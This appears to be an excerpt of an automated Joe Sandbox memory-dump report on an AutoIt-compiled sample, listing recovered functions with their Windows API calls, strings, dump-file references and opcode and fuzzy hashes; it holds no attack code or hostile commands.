Function 002D12F3 Relevance: 7.6, APIs: 5, Instructions: 67COMMON

Download Yara Rule

APIs

ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 002D134D
SelectObject.GDI32(?,00000000), ref: 002D135C
BeginPath.GDI32(?), ref: 002D1373
SelectObject.GDI32(?,00000000), ref: 002D139C

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: 05ac7c3eb57f66b1e6964837e8815c9c0a9998ccf241ff084c97c61bac6e0826
Instruction ID: 82edfa0b6b91e352a22918f9305d474c56bb866f7a46c17d4f5f76e1ff280330
Opcode Fuzzy Hash: 05ac7c3eb57f66b1e6964837e8815c9c0a9998ccf241ff084c97c61bac6e0826
Instruction Fuzzy Hash: 15213E70815319EFDB129F29DC097697BBCEB10362F148267F810966B0D7729DA1DB90

Function 0032C161 Relevance: 7.6, APIs: 5, Instructions: 61COMMON

Download Yara Rule

APIs

_memcmp.LIBCMT ref: 0032C176
_memcmp.LIBCMT ref: 0032C194
_memcmp.LIBCMT ref: 0032C1A7
_memcmp.LIBCMT ref: 0032C1BF
_memcmp.LIBCMT ref: 0032C1D7

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: 8b8bfa739c1a8012aefa4c0a01372e870236f16b671d3515036878cd0d571f3e
Instruction ID: e7fccb0ebf4866883385214b6e0d3f77fa48304c8d7f4740fdb7a5099f8df0b7
Opcode Fuzzy Hash: 8b8bfa739c1a8012aefa4c0a01372e870236f16b671d3515036878cd0d571f3e
Instruction Fuzzy Hash: FC0192B16245297BE206A6207C43EBFA75CAF213D8B458121FE04D6283E655BE3186E0

Function 00334D35 Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00334D5C
__beginthreadex.LIBCMT ref: 00334D7A
MessageBoxW.USER32(?,?,?,?), ref: 00334D8F
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00334DA5
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00334DAC

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
String ID:
API String ID: 3824534824-0
Opcode ID: 39abde85c274e99c26c72ce1b2c8d0b887cb41388ad0f00af43b28193cf2602e
Instruction ID: 45fc0517d2ca7f71a8327d675d5f2df80c09bd6ab28925a5264bfc474be1e9ee
Opcode Fuzzy Hash: 39abde85c274e99c26c72ce1b2c8d0b887cb41388ad0f00af43b28193cf2602e
Instruction Fuzzy Hash: F61104B6905249BFC7039BB8DC48AEB7FACEB45321F14426AF914D3261D6758D048BA0

Function 0032874A Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00328766
GetLastError.KERNEL32(?,0032822A,?,?,?), ref: 00328770
GetProcessHeap.KERNEL32(00000008,?,?,0032822A,?,?,?), ref: 0032877F
RtlAllocateHeap.NTDLL(00000000,?,0032822A), ref: 00328786
GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0032879D

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocateErrorLastProcess
String ID:
API String ID: 883493501-0
Opcode ID: 6672027731d2a28e76b7ab06a355004a06fea0ddb58c912c2503d7d7693cdae4
Instruction ID: a2542e7bfd395d7a00788d4ca7245a95c1019fbb6439bc201026077aee8b2445
Opcode Fuzzy Hash: 6672027731d2a28e76b7ab06a355004a06fea0ddb58c912c2503d7d7693cdae4
Instruction Fuzzy Hash: D101FF75601614EFDB124FA9EC48DAB7B6DEF85756B200569F849C3160DA329D10CA60

Function 003354E6 Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00335502
QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00335510
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00335518
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00335522
Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0033555E

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: 8e39d105c23e9ba86d5c74d3b603c6f58de173dbb0e4d9e19d498e713334067a
Instruction ID: 65191ed2a9d94ef368e2c9c356e6c8b77127e17a00c4f01edd24c44a61fe11fc
Opcode Fuzzy Hash: 8e39d105c23e9ba86d5c74d3b603c6f58de173dbb0e4d9e19d498e713334067a
Instruction Fuzzy Hash: 26011B35D11A29DBDF02EFE9E8885EDBB7DBB0A712F010556E902B2150DB30A654C7A1

Function 003285F1 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00328608
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00328612
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00328621
RtlAllocateHeap.NTDLL(00000000,?,00000002), ref: 00328628
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0032863E

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: HeapInformationToken$AllocateErrorLastProcess
String ID:
API String ID: 47921759-0
Opcode ID: 9f6fc1b5c2a4e2703e780a8e4eeb408c03cebbbf3e5e93ebb90d1a1565faf420
Instruction ID: a7155f0b7ee528668fb0ee0bdf8b9c334c33a3d2e0117bfeff18dccee7dd30cd
Opcode Fuzzy Hash: 9f6fc1b5c2a4e2703e780a8e4eeb408c03cebbbf3e5e93ebb90d1a1565faf420
Instruction Fuzzy Hash: 24F06235202315AFEB220FA5EC8DE6B3BACEF89755F040425FA45C71A0CB71DC41DA60

Function 00328652 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00328669
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00328673
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00328682
RtlAllocateHeap.NTDLL(00000000,?,TokenIntegrityLevel), ref: 00328689
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0032869F

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: HeapInformationToken$AllocateErrorLastProcess
String ID:
API String ID: 47921759-0
Opcode ID: 85eef98a7268ca5c6d14275d0313dce4f332f13f5249c9865c8ea81700225bb9
Instruction ID: 04fb39888de814a0acac22ce928414f2adf83e9a6550e4fafe8e88ebefc4c197
Opcode Fuzzy Hash: 85eef98a7268ca5c6d14275d0313dce4f332f13f5249c9865c8ea81700225bb9
Instruction Fuzzy Hash: 2FF04F75302314AFEB121FA5EC88EAB3BADEF89756F140025FA45C71A0CA61D941DA60

Function 0032C6A6 Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 0032C6BA
GetWindowTextW.USER32(00000000,?,00000100), ref: 0032C6D1
MessageBeep.USER32(00000000), ref: 0032C6E9
KillTimer.USER32(?,0000040A), ref: 0032C705
EndDialog.USER32(?,00000001), ref: 0032C71F

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: 68e9047facc5a3ac1ec906ea1b90740e741476f5b3cca77ab9d185fff2653940
Instruction ID: 1bcf74da36265e973239a6dd2f2d596993c18a0b5e23421d6d5a254bb6e27cd9
Opcode Fuzzy Hash: 68e9047facc5a3ac1ec906ea1b90740e741476f5b3cca77ab9d185fff2653940
Instruction Fuzzy Hash: 5201A230410314AFEB226B24EC5EF9A77BCFF00702F041669F582A14F0EBE0A9548F80

Function 002D13B0 Relevance: 7.5, APIs: 5, Instructions: 29COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 002D13BF
StrokeAndFillPath.GDI32(?,?,0030BAD8,00000000,?), ref: 002D13DB
SelectObject.GDI32(?,00000000), ref: 002D13EE
DeleteObject.GDI32 ref: 002D1401
StrokePath.GDI32(?), ref: 002D141C

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: 37fcfc0aa1823931c0b4d2f3763463da05e374d39b7c96de06b50bceaf043787
Instruction ID: 99cb9ad455493191c919b6380f9b40860a4d35472a3ae9168897263a69a0a0e7
Opcode Fuzzy Hash: 37fcfc0aa1823931c0b4d2f3763463da05e374d39b7c96de06b50bceaf043787
Instruction Fuzzy Hash: 59F0C430019709EFDB136F2AEC0D7583BACAB01326F088226E429965F1C73289A5DF50

Function 00328E74 Relevance: 7.5, APIs: 5, Instructions: 23memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 00328E7F
CloseHandle.KERNEL32(?), ref: 00328E94
CloseHandle.KERNEL32(?), ref: 00328E9C
GetProcessHeap.KERNEL32(00000000,?), ref: 00328EA5
HeapFree.KERNEL32(00000000), ref: 00328EAC

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessSingleWait
String ID:
API String ID: 3751786701-0
Opcode ID: 4800d3ac80e4ac3cbbdd065127f1a177c65bbdf445cec665eba88929edc22485
Instruction ID: 7d37aa3dda478f375b9e5c3e90047bff58e0fcffe95c71fa3dfd338e4c238129
Opcode Fuzzy Hash: 4800d3ac80e4ac3cbbdd065127f1a177c65bbdf445cec665eba88929edc22485
Instruction Fuzzy Hash: 76E05276105605FFDA022FE5EC0C95ABB6DFB89763B508631F21981470CB32A561DB90

Function 002E2E5B Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON

Download Yara Rule

APIs

Part of subcall function 002F0FF6: std::exception::exception.LIBCMT ref: 002F102C
Part of subcall function 002F0FF6: __CxxThrowException@8.LIBCMT ref: 002F1041

Part of subcall function 002D7F41: _memmove.LIBCMT ref: 002D7F82

Part of subcall function 002D7BB1: _memmove.LIBCMT ref: 002D7C0B

__swprintf.LIBCMT ref: 002E302D

Strings

\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 002E2EC6

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
API String ID: 1943609520-557222456
Opcode ID: bd342ff860466f42f743ace53facc085fb96dd7969818ef107bc62126d23fbe6
Instruction ID: e2ae6037834e1d2276fe80a7bd8dbd03aa6f59125ced81cfa01cc0d819adbaa1
Opcode Fuzzy Hash: bd342ff860466f42f743ace53facc085fb96dd7969818ef107bc62126d23fbe6
Instruction Fuzzy Hash: F99190711283519FC718EF24D886C6EB7B8EF45740F40491EF442972A1EB70EE65CB52

Function 0032B7B6 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 241comCOMMON

Download Yara Rule

APIs

OleSetContainedObject.OLE32(?,00000001), ref: 0032B981

Strings

AutoIt3GUI, xrefs: 0032B8F9
Container, xrefs: 0032B8FE
%6, xrefs: 0032BA24

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: ContainedObject
String ID: AutoIt3GUI$Container$%6
API String ID: 3565006973-1037786575
Opcode ID: 2e44f2526fb249b767c34a03f82d919cde601919d6c6e57a9dca9b7625a2f881
Instruction ID: a54cf4753ed06d8ac23c33a0007b748cfb68263cf95ab96d58e6e8285b8f7999
Opcode Fuzzy Hash: 2e44f2526fb249b767c34a03f82d919cde601919d6c6e57a9dca9b7625a2f881
Instruction Fuzzy Hash: 96915974600611AFDB25DF28D884B6ABBF8FF49710F24856EF94ACB691DB70E840CB50

Function 002F524D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 002F52DD

Part of subcall function 00300340: __87except.LIBCMT ref: 0030037B

Strings

pow, xrefs: 002F52B5, 002F52D2

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: ErrorHandling__87except__start
String ID: pow
API String ID: 2905807303-2276729525
Opcode ID: 73818baf2a5b8704734ac941149ce4fe368d0188fc2b1716f96d661d84101b55
Instruction ID: c32ed1971249f3b0da4d077e0ec3a3ecc1a48f17b71c6663720e6881a16791d2
Opcode Fuzzy Hash: 73818baf2a5b8704734ac941149ce4fe368d0188fc2b1716f96d661d84101b55
Instruction Fuzzy Hash: C151B021E2EA0687C71B7B29C92037EAB949B00390F608EB8E7D5451D5DFB48CE49F49

Function 002F023B Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMON

Download Yara Rule

Strings

+, xrefs: 002F0277
#, xrefs: 002F0280

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID:
String ID: #$+
API String ID: 0-2552117581
Opcode ID: 1bb6df4781d04d58e2f6d1efa5270e836d4f53784e1619d628186f69406601bd
Instruction ID: 32474bc0815d528db4e04a1fdc6cee0fc639dcca39c02cc04df47e3ac7403903
Opcode Fuzzy Hash: 1bb6df4781d04d58e2f6d1efa5270e836d4f53784e1619d628186f69406601bd
Instruction Fuzzy Hash: 6851773510426ADFDF26DF28E4886FEBBA4EF15310F1440A6FC919B2A1D7349E52CB60

Function 002E3297 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 161COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 002E33D7
_memmove.LIBCMT ref: 002E3470
_free.LIBCMT ref: 002E3496
_memmove.LIBCMT ref: 002E3549

Strings

Oa., xrefs: 002E3482

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: _memmove$_free
String ID: Oa.
API String ID: 2620147621-615990470
Opcode ID: a05dd03d02bdade09b93cf3533ad1a40b48b0986f1041d4faade61d12b4614a3
Instruction ID: 7f3d5954f53f7000d1fd51b9343c1bfbdb72c92f4af48c04b694e235101933eb
Opcode Fuzzy Hash: a05dd03d02bdade09b93cf3533ad1a40b48b0986f1041d4faade61d12b4614a3
Instruction Fuzzy Hash: A4519C716183819FDB28CF29C484B6BBBE5BF89304F84492DE98987351DB31D951CF82

Function 002E62F2 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 143COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 002E63A8
_memmove.LIBCMT ref: 002E6446
_memset.LIBCMT ref: 002E646A

Strings

ERCP, xrefs: 002E6313

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

